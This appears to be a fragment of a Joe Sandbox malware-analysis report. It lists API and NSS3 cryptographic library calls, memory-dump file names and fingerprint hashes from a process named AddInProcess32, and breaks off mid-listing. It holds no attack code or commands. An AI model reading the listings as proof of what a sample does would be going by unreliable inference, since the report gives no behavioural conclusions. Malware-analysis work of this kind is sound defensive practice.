                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CD64468,?,00000000,?,00000000), ref: 6CD061C8
                                                                                      • PORT_Alloc_Util.NSS3(00000008,?,?,?,?,00000000,?,00000000), ref: 6CD061DA
                                                                                      • DER_GetInteger_Util.NSS3(?,?,?,?,?,00000000,?,00000000), ref: 6CD061EE
                                                                                      • DER_GetInteger_Util.NSS3(?,?,?,?,?,?,00000000,?,00000000), ref: 6CD061FA
                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CD644B8,?,00000000,?,00000000), ref: 6CD06269
                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,00000000,?,00000000), ref: 6CD06280
                                                                                      • DER_GetInteger_Util.NSS3(?,?,?,?,?,00000000,?,00000000), ref: 6CD0629E
                                                                                      • DER_GetInteger_Util.NSS3(?,?,?,?,?,?,00000000,?,00000000), ref: 6CD062AA
                                                                                      • memcpy.VCRUNTIME140(00000010,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6CD062CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_Item_$Decode$Integer_$Arena_FreeTag_$ErrorFindmemcpy$AlgorithmAlgtagError_Get_K11_MallocMechanismOctetStringTemplate_
                                                                                      • String ID:
                                                                                      • API String ID: 4006335748-0
                                                                                      • Opcode ID: 926470ab57195bb75f3b459006888806bf570b6bfcfcd4fc8fe56af107c881af
                                                                                      • Instruction ID: ec917a0729339f96ad286430bfdda0ebaa1eee0cf36020a43fbc16931ddb4abe
                                                                                      • Opcode Fuzzy Hash: 926470ab57195bb75f3b459006888806bf570b6bfcfcd4fc8fe56af107c881af
                                                                                      • Instruction Fuzzy Hash: C3C1B8F2E45205DADB109F6CC884BDDBBE8EB04308F14452AED94E7E70E738D9918695
                                                                                      APIs
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC62F0C
                                                                                        • Part of subcall function 6CC84952: memset.VCRUNTIME140(6CC6292D,00000000,00000030,?,?,?,6CC6292D,?,?,?,?), ref: 6CC8495F
                                                                                      • sqlite3_result_error_nomem.NSS3(?), ref: 6CC63010
                                                                                      • ___swprintf_l.LIBCMT(00000005,00000002,%04d,?), ref: 6CC630BF
                                                                                      • ___swprintf_l.LIBCMT(00000003,?,%02d,?), ref: 6CC630E6
                                                                                      • ___swprintf_l.LIBCMT(00000003,?,%02d,?), ref: 6CC6313E
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC631A5
                                                                                      • __allrem.LIBCMT ref: 6CC631B0
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC631D8
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC6325E
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC63287
                                                                                      • __allrem.LIBCMT ref: 6CC63293
                                                                                      • ___swprintf_l.LIBCMT(00000004,00000001,%03d,00000001,?,?,05265C00,00000000), ref: 6CC632BB
                                                                                      • ___swprintf_l.LIBCMT(00000007,00000000,%06.3f), ref: 6CC632EB
                                                                                      • sqlite3_result_text.NSS3(?,?,?,Function_00041C3C), ref: 6CC6332C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l$Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memsetsqlite3_result_error_nomemsqlite3_result_textsqlite3_value_text
                                                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                      • API String ID: 76527468-1989508764
                                                                                      • Opcode ID: 3dd1801e65ded8c2a2775b1233bab0320b31065d858550d1864f1660cfdefe9c
                                                                                      • Instruction ID: 3d44667a7e982ef17e376f3bf356f16f89572c9be35c84c3bc6d770c801a83f2
                                                                                      • Opcode Fuzzy Hash: 3dd1801e65ded8c2a2775b1233bab0320b31065d858550d1864f1660cfdefe9c
                                                                                      • Instruction Fuzzy Hash: BEC15BB1904255AEDB21CF7ACEC4FEAB778EF42308F144159E508EBE41FB3099458B91
                                                                                      APIs
                                                                                      • PORT_ZAlloc_Util.NSS3(00000001,00000000,?,00000000,?,?,?,6CD0C6C1,00000000,?,?,?,?,?,?,?), ref: 6CD1EEE5
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,6CD0C6C1,00000000,?,?,?,?), ref: 6CD1EEF3
                                                                                      • PR_smprintf_free.NSS3(00000000,?,6CD13E21,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CD1EF4E
                                                                                      • PR_smprintf.NSS3(%s=%d,trustOrder,00000032), ref: 6CD1EFA4
                                                                                      • PR_smprintf.NSS3(%s=%d,cipherOrder,00000000), ref: 6CD1EFC9
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD1EFEC
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CD1F00A
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD1F02E
                                                                                      • PR_smprintf.NSS3(%s %s %s %s %s,6CD13E21,6CD51970,?,00000000,00000000), ref: 6CD1F045
                                                                                      • NSSUTIL_ArgStrip.NSS3(00000000,00000000,00000000,?,6CD51970,6CD13E21), ref: 6CD1F072
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CD1F080
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: R_smprintfR_smprintf_freeUtil$Free_$Alloc_Stripmemset
                                                                                      • String ID: %s %s %s %s %s$%s=%d$2$Flags$cipherOrder$ciphers$slotParams$trustOrder
                                                                                      • API String ID: 3827166490-2254995531
                                                                                      • Opcode ID: 95206895366586c6e375f8b0c45fdf2bc766f744f8d70e4d466df67d228f9da8
                                                                                      • Instruction ID: 47c6a9ff0a29fa4663d688685a03f73fb2d63c86730c6f48083d913bad35d893
                                                                                      • Opcode Fuzzy Hash: 95206895366586c6e375f8b0c45fdf2bc766f744f8d70e4d466df67d228f9da8
                                                                                      • Instruction Fuzzy Hash: 42510432908219AFEF029F65EC44ADE7BBAFF49358F190164FD0867E20D7719915CBA0
                                                                                      APIs
                                                                                      • NSSUTIL_ArgStrip.NSS3(?), ref: 6CD1E845
                                                                                      • PL_strncasecmp.NSS3(00000000,library=,00000008), ref: 6CD1E873
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD1E88C
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000008,?), ref: 6CD1E897
                                                                                      • PL_strncasecmp.NSS3(00000000,name=,00000005), ref: 6CD1E8AB
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD1E8C4
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000005,?), ref: 6CD1E8CF
                                                                                      • PL_strncasecmp.NSS3(00000000,parameters=,0000000B), ref: 6CD1E8E8
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD1E8FD
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6CD1E908
                                                                                      • PL_strncasecmp.NSS3(00000000,nss=,00000004), ref: 6CD1E91D
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD1E932
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000004,?), ref: 6CD1E93D
                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CD1E947
                                                                                      • NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CD1E950
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FetchFree_L_strncasecmpUtilValue$Strip$ParameterSkip
                                                                                      • String ID: library=$name=$nss=$parameters=
                                                                                      • API String ID: 235654050-246541607
                                                                                      • Opcode ID: 1d495d1a21acfc2d8d6e2480361ef9cbc11147314a3ed796a5d9803fa168d2e1
                                                                                      • Instruction ID: 8c0da1ee788c02885926dbb8b53b0e6974c77fbd0e0a65ed527539d4ab941fa6
                                                                                      • Opcode Fuzzy Hash: 1d495d1a21acfc2d8d6e2480361ef9cbc11147314a3ed796a5d9803fa168d2e1
                                                                                      • Instruction Fuzzy Hash: E231B37240D615AFEB029F25FC44BCA37A8EF45368F140026FC499AEB1EB359958C7E1
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,?,?), ref: 6CD24F1D
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000000,?,?,?), ref: 6CD24F2E
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,?,?,?), ref: 6CD24F40
                                                                                      • memset.VCRUNTIME140(00000018,00000000,00000068,?,?,?), ref: 6CD24F5E
                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000018,00000003,00000018,00000000,00000068,?,?,?), ref: 6CD24F68
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,?,?,?,?,?,?,?,?,?), ref: 6CD24F79
                                                                                      • SEC_PKCS7CreateSignedData.NSS3(?,00000004,?,?,00000000,?,?,?,?,?,?,?,?), ref: 6CD24FA2
                                                                                      • SEC_PKCS7IncludeCertChain.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD24FBA
                                                                                      • SEC_PKCS7AddSigningTime.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD24FCF
                                                                                      • memset.VCRUNTIME140(00000080,00000000,00000040,?,?,?,?,?,?), ref: 6CD2500C
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,000000A8,00000000,?,?,?,?,?,?,?,?,?), ref: 6CD25026
                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(00000000,000000B4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD25045
                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,00000000,00000000), ref: 6CD2508A
                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,00000000,00000001,00000000,00000000), ref: 6CD25095
                                                                                      • PK11_KeyGen.NSS3(00000000,8000000B,?,00000014,00000000), ref: 6CD250D2
                                                                                      • PK11_CreateContextBySymKey.NSS3(00000000,00000108,?,?,?), ref: 6CD250FD
                                                                                      • PK11_FreeSymKey.NSS3(?,00000000,00000108,?,?,?), ref: 6CD25109
                                                                                      • PK11_DigestBegin.NSS3(?), ref: 6CD25120
                                                                                      • PORT_ArenaRelease_Util.NSS3(00000000,00000000,?,?,?,?,?,?), ref: 6CD25145
                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?), ref: 6CD25156
                                                                                      • PT_FPrintStats.NSS3(00000000,00000000,?,?,?,?,?,?), ref: 6CD25178
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_K11_$ArenaZfree$CreateEncodeError_Integer_memset$Alloc_BeginCertChainContextCopyDataDigestFreeIncludeMark_PrintRelease_SignedSigningStatsTime
                                                                                      • String ID:
                                                                                      • API String ID: 662005515-0
                                                                                      • Opcode ID: 4114bb4b226dd1eabd3444a0dabcc914e5c77e5eb7295f36e11d839deb883e37
                                                                                      • Instruction ID: bb4df48dd6440ccc90b42192c38f9e40969f52b756022ee62e289821d0dbb351
                                                                                      • Opcode Fuzzy Hash: 4114bb4b226dd1eabd3444a0dabcc914e5c77e5eb7295f36e11d839deb883e37
                                                                                      • Instruction Fuzzy Hash: A881F271905212FBEB129F64DC40F9A77B8AF0470CF100166EF04ABEA4EB79E554CBA0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE006), ref: 6CCECB1A
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CCECB4E
                                                                                      • PK11_GetPrivateModulusLen.NSS3(?), ref: 6CCECB91
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CCECBAA
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CCECBCF
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CCECC39
                                                                                      • NSS_Get_SECOID_AlgorithmIDTemplate_Util.NSS3(00000000,00000000,0000000C), ref: 6CCECC69
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,0000000C), ref: 6CCECC76
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CCECC8A
                                                                                      • HASH_ResultLenByOidTag.NSS3(000000C1), ref: 6CCECC98
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCECCD6
                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,?), ref: 6CCECDB9
                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(?,?,?), ref: 6CCECDE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Algorithm$Tag_$Item_$DecodeEncodeError_Quick$ErrorGet_Integer_K11_ModulusPrivateResultTemplate_
                                                                                      • String ID:
                                                                                      • API String ID: 3976248111-0
                                                                                      • Opcode ID: b57442ee98b4f1dd5c1026ad60504e0bb5e68895839e7c39697bd3e39bf7f8f3
                                                                                      • Instruction ID: 79631eb76e95ffa4b2918c1c3d7521166717a63cb904f7c0341d2e5ce9c71980
                                                                                      • Opcode Fuzzy Hash: b57442ee98b4f1dd5c1026ad60504e0bb5e68895839e7c39697bd3e39bf7f8f3
                                                                                      • Instruction Fuzzy Hash: 2C911A72D05225ABEB14BB68DC41BED7FB8AF0A318F240466E824B2D90F731DA84C651
                                                                                      APIs
                                                                                      • SECKEY_CreateSubjectPublicKeyInfo.NSS3(?,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B,6CD2ACBA), ref: 6CD2CE7C
                                                                                        • Part of subcall function 6CCEB3AA: PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCEB3B8
                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CE89
                                                                                        • Part of subcall function 6CCEB5C7: PK11_DestroyObject.NSS3(458BC35D,1C638308,00000000,?,6CCEC210,00000000,?,00000000,00000000,00000000,6CCFBD54,6CCE41F1,00000000,?,6CCFD886,6CCE41F1), ref: 6CCEB5EF
                                                                                        • Part of subcall function 6CCEB5C7: PK11_FreeSlot.NSS3(458BC35D,00000000,?,6CCEC210,00000000,?,00000000,00000000,00000000,6CCFBD54,6CCE41F1,00000000,?,6CCFD886,6CCE41F1,00000000), ref: 6CCEB5F9
                                                                                        • Part of subcall function 6CCEB5C7: PORT_FreeArena_Util.NSS3(6CCEC210,00000000,00000000,?,6CCEC210,00000000,?,00000000,00000000,00000000,6CCFBD54,6CCE41F1,00000000,?,6CCFD886,6CCE41F1), ref: 6CCEB608
                                                                                      • SECOID_CopyAlgorithmID_Util.NSS3(00000000,?,00000004,?,?,00000000,6CD2ACBA), ref: 6CD2CE9D
                                                                                        • Part of subcall function 6CD18BB7: SECITEM_CopyItem_Util.NSS3(?,-00000004,000000D4,00000000,00000000,?,6CCEB243,000000D4,-00000004,?,?,00000000,000000D4,?), ref: 6CD18BC7
                                                                                        • Part of subcall function 6CD18BB7: SECITEM_CopyItem_Util.NSS3(?,00000008,000000E0,-00000004,?,?,00000000,000000D4,?), ref: 6CD18BDE
                                                                                      • SGN_DestroyDigestInfo_Util.NSS3(00000000,00000000,?,00000004,?,?,00000000,6CD2ACBA), ref: 6CD2CEA3
                                                                                        • Part of subcall function 6CCE58D6: PORT_FreeArena_Util.NSS3(6CCDD853,00000000,?,6CCDD853,00000000), ref: 6CCE58E9
                                                                                      • PK11_FindKeyByAnyCert.NSS3(?,?,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CEBD
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(46890C47,46890C47,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CEE5
                                                                                      • SECOID_DestroyAlgorithmID_Util.NSS3(?,00000000,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CEFB
                                                                                      • PORT_NewArena_Util.NSS3(00000400,?,?,00000000,6CD2ACBA), ref: 6CD2CF47
                                                                                      • PORT_SetError_Util.NSS3(FFFFE006,?,?,?,?,?,00000000,6CD2ACBA), ref: 6CD2CF58
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CF6A
                                                                                      • SECKEY_DestroyPrivateKey.NSS3(00000000,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CF76
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2CF83
                                                                                      • SEC_GetSignatureAlgorithmOidTag.NSS3(?,46890C47,?,?,?,?,?,00000000,6CD2ACBA), ref: 6CD2CFC2
                                                                                      • _mbstowcs_s.LIBCMT(?,?,?,00000000,00000000,?,?,?,?,?,00000000,6CD2ACBA), ref: 6CD2CFE0
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,00000000,00000000,?,?,?,?,?,00000000,6CD2ACBA), ref: 6CD2CFEB
                                                                                      • SECKEY_DestroyPrivateKey.NSS3(00000000,?,00000000,6CD2ACBA,?,?,?,?,?,?,?,?,?,?,?,6CD2C27B), ref: 6CD2D00C
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,46890C8F,?,?,00000000,6CD2ACBA), ref: 6CD2D02A
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000,?,?,?,?,00000000,6CD2ACBA), ref: 6CD2D03F
                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,46890C77,46890C47,00000000,?,00000000,?,?,?,?,00000000,6CD2ACBA), ref: 6CD2D04F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free$Destroy$AlgorithmArena_Item_$Copy$K11_$Error_PrivatePublic$CertCreateDigestFindInfoInfo_ObjectSignatureSlotSubjectTag__mbstowcs_s
                                                                                      • String ID:
                                                                                      • API String ID: 1952341039-0
                                                                                      • Opcode ID: 4df36b7dab92e07ec9cef70b4749f4ad9170fa058fc5df7f5fb522f526483a5d
                                                                                      • Instruction ID: 521cb021c0cb18ab962b96af3c632fdcc19d31c4ad04af5fd261433611407fbe
                                                                                      • Opcode Fuzzy Hash: 4df36b7dab92e07ec9cef70b4749f4ad9170fa058fc5df7f5fb522f526483a5d
                                                                                      • Instruction Fuzzy Hash: 85619772809609FFEB11AFA4DC80EEE77F9AF4435CF104126EB0496A60F735DA498760
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,00000000,00000000), ref: 6CD0CE48
                                                                                        • Part of subcall function 6CD18C17: SECOID_FindOIDTag_Util.NSS3(?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD18C28
                                                                                      • PORT_NewArena_Util.NSS3(?,00000000,00000000,00000000), ref: 6CD0CE58
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • memset.VCRUNTIME140(?,00000000,00000044,00000000,00000000,00000000), ref: 6CD0CE70
                                                                                      • PK11_GetIVLength.NSS3(00000000,00000000,00000000,00000000,00000000), ref: 6CD0CE8A
                                                                                      • PK11_AlgtagToMechanism.NSS3(00000000,00000000,00000000,00000000), ref: 6CD0CE84
                                                                                        • Part of subcall function 6CD04F1E: SECOID_FindOIDByTag_Util.NSS3(00000000,?,6CCFDE36,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6CD04F24
                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CD65558,?,00000000,00000000,00000000), ref: 6CD0CEBC
                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CD654D0,?,00000000,00000000,00000000,00000000,00000000), ref: 6CD0CEE7
                                                                                        • Part of subcall function 6CD18D87: SEC_ASN1Decode_Util.NSS3(?,00000000,?,?,?,?,6CCE5A0D,?,00000000,00000000,00000000), ref: 6CD18D9C
                                                                                      • DER_GetInteger_Util.NSS3(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CF03
                                                                                      • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CF1F
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CF45
                                                                                      • PORT_SetError_Util.NSS3(FFFFE006,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CF68
                                                                                      • memcpy.VCRUNTIME140(00000024,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CFB3
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CFE6
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0CFF1
                                                                                      • memcpy.VCRUNTIME140(00000018,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0D011
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0D044
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Tag_$Arena_$AlgorithmDecodeFindFreeItem_K11_memcpy$AlgtagAlloc_Decode_ErrorError_Free_Integer_LengthMechanismmemset
                                                                                      • String ID:
                                                                                      • API String ID: 70105103-0
                                                                                      • Opcode ID: 1fb46424bffe9ad845cb445a3d6971c56a51d346ece309d5bfb51dae0621bf48
                                                                                      • Instruction ID: 3b517ff8fe8eea123c35e33532000e46d0760678e7db722d48850e4898f9b9db
                                                                                      • Opcode Fuzzy Hash: 1fb46424bffe9ad845cb445a3d6971c56a51d346ece309d5bfb51dae0621bf48
                                                                                      • Instruction Fuzzy Hash: E051F3B2A05205EFDB10EFACDC40A9DBBF8EF41318F104529E414A7F60E775DA5587A2
                                                                                      APIs
                                                                                        • Part of subcall function 6CD25C97: SECOID_FindOID_Util.NSS3(?,?,?,6CD25CFD,?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25CA8
                                                                                      • PK11_AlgtagToMechanism.NSS3(?,?,00000000,00000000,?,6CD2442F,?,6CD2467F,?,00000000), ref: 6CD27ED7
                                                                                      • PK11_GetBestSlot.NSS3(00000000,?,?,?,00000000,00000000,?,6CD2442F,?,6CD2467F,?,00000000), ref: 6CD27EE3
                                                                                      • PK11_KeyGen.NSS3(00000000,?,00000000,?,?,?,00000000,00000000,?,6CD2442F,?,6CD2467F,?,00000000), ref: 6CD27F0A
                                                                                      • PK11_FreeSlot.NSS3(6CD2442F,00000000,?,00000000,?,?,?,00000000,00000000,?,6CD2442F,?,6CD2467F,?,00000000), ref: 6CD27F15
                                                                                      • PORT_ArenaMark_Util.NSS3(?,?,00000000,00000000), ref: 6CD27F2D
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000,00000000), ref: 6CD27F5F
                                                                                      • CERT_ExtractPublicKey.NSS3(6CD2467F,?,00000000,00000000), ref: 6CD27F71
